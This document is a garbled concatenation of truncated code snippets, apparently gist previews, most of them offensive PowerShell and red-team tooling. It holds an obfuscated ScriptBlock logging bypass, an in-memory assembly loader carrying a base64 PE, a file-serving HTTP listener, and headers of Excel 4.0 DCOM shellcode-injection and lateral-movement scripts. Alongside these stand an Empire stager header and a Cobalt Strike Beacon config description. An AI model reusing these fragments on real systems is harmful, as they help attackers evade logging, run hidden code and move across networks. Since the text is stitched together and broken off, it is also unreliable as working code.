yum install /usr/bin/virt-install virtio-win
virt-install \
--name 2016 \
--memory 8192 \
from lib.common import helpers | |
class Stager: | |
def __init__(self, mainMenu, params=[]): | |
self.info = { | |
'Name': 'JS Launcher StarFighter', | |
'Author': ['Cn33liz'], |
package jwtex | |
import ( | |
"encoding/base64" | |
"encoding/json" | |
"fmt" | |
"strings" | |
"testing" | |
) |
$Hso = New-Object Net.HttpListener | |
$Hso.Prefixes.Add("http://+:8000/") | |
$Hso.Start() | |
While ($Hso.IsListening) { | |
$HC = $Hso.GetContext() | |
$HRes = $HC.Response | |
$HRes.Headers.Add("Content-Type","text/plain") | |
$Buf = [Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl))) | |
$HRes.ContentLength64 = $Buf.Length | |
$HRes.OutputStream.Write($Buf,0,$Buf.Length) |
<# | |
Lateral movement and shellcode injection via Excel 4.0 macros | |
Author: Philip Tsukerman (@PhilipTsukerman) | |
License: BSD 3-Clause | |
Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank - https://github.com/outflanknl/Excel4-DCOM | |
#> | |
function Invoke-ExShellcode | |
{ | |
<# |
[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript'); | |
$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");' | |
[Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()); |
meta: | |
id: beaconconfig | |
title: Cobalt Strike Beacon Config | |
endian: be | |
doc: | | |
Cobalt Strike Beacon is a popular offensive security tool. Beacon itself | |
is a DLL that gets injected into memory and can be staged from C2 servers. | |
The Beacon DLL (in unencoded form) contains a configuration section that gets | |
patched by the C2 server. This section is a fixed predictable structure |
$Domain = [AppDomain]::CurrentDomain | |
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly') | |
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule') | |
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into. | |
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll') | |
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public) | |
$TypeBuilder.CreateType() | |
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |
# ScriptBlock Logging Bypass | |
# @cobbr_io | |
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
If ($GroupPolicyField) { | |
$GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
} |
#********************************************************************** | |
# Invoke-Excel4DCOM64.ps1 | |
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support | |
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason | |
# Date: 2019/04/21 | |
# Version: 1.1 | |
#********************************************************************** | |
function Invoke-Excel4DCOM | |
{ |